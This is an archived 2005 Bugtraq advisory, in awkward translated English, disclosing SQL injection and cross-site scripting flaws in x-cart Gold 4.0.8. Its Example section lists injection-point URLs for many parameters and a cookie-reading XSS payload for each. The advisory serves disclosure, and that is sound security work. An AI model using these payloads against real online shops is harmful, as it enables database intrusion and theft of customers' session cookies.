Home page logo
/

bugtraq logo Bugtraq mailing list archives

Multiple vulnerabilities in x-cart Gold
From: CENSORED <censored () mail ru>
Date: 31 May 2005 03:38:16 -0000



SVadvisory#7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                  Title: Multiple vulnerabilities in x-cart Gold 
            The program: x-cart Gold 
 The vulnerable version: 4.0.8 
               Homepage: www.x-cart.com 
 Vulnerability is found: 29.05.05 
              Has found: CENSORED / SVT / www.svt.nukleon.us 
===================================================================== 
The description. 
 
SQL - injections 
--------------- 
At research of a product the set Multiple vulnerabilities was revealed 
SQL-Injections. Vulnerability mentions practically all parameters. 
The first mistake has been found in parameter "cat". In a script 
There is no check of this parameter and at substitution of a symbol 
"'" Probably, to make SQL-an injection. Further the mistake has been 
found in Parameter "productid" as from - for absence of check on 
Special symbols, by transfer to this parameter of a symbol "'" occurs 
Mistake SQL, and script forwards automatically on page 
Speaking about a mistake. On this page the parameter "id" is visible to it 
We transfer a symbol "'" and as probably to make SQL - an injection. 
Further we look parameter "mode", at substitution Special symbols 
There is a mistake and probably to make SQL - an injection. We shall wound 
And parameter "section" in it it is possible to make SQL - an injection. 

XSS 
--------------- 
Vulnerability of type XSS can make in the same parameters as at mistakes 
SQL - injections 
=====================================================================
Example
^^^^^^^^^
SQL - injections
---------------
http://example/home.php?cat='[SQL-inj]
http://example/home.php?printable='[SQL-inj]
http://example/product.php?productid='[SQL-inj]
http://example/product.php?mode='[SQL-inj]
http://example/error_message.php?access_denied&id='[SQL-inj]
http://example/help.php?section='[SQL-inj]
http://example/orders.php?mode='[SQL-inj]
http://example/register.php?mode='[SQL-inj]
http://example/search.php?mode='[SQL-inj]
http://example/giftcert.php?gcid='[SQL-inj]
http://example/giftcert.php?gcindex='[SQL-inj]

XSS
---------------
http://example/home.php?cat=&apos;>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/home.php?printable=&apos;>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/product.php?productid=&apos;>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/product.php?mode=&apos;>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/error_message.php?access_denied&id=&apos;>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/help.php?section=&apos;>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/orders.php?mode=&apos;>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/register.php?mode=&apos;>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/search.php?mode=&apos;>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/giftcert.php?gcid=&apos;>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://example/giftcert.php?gcindex=&apos;>&lt;script&gt;alert(document.cookie)&lt;/script&gt;
=====================================================================


The conclusion. 
^^^^^^^^^^^ 
Researches made only on version 4.0.8. Other versions as 
Can be vulnerable. The manufacturer in popularity is put. If is 
What that remarks write on censored () mail ru 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Search Vulnerabilities Team / www.svt.nukleon.us /
CENSORED | Cash | Fredy | patr0n | Loader |
                                          ___
                                ___      /  /
                    ____________\__\___ /  /
                   |   _______________// _/_
               ____|__________   |\  \/ |   |
              /__________________| \____/   |
                                     ___|   |___
                                    |___     ___|
                                        |   |___
                                        |_______|


  By Date           By Thread  

Current thread:
  • Multiple vulnerabilities in x-cart Gold CENSORED (May 30)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault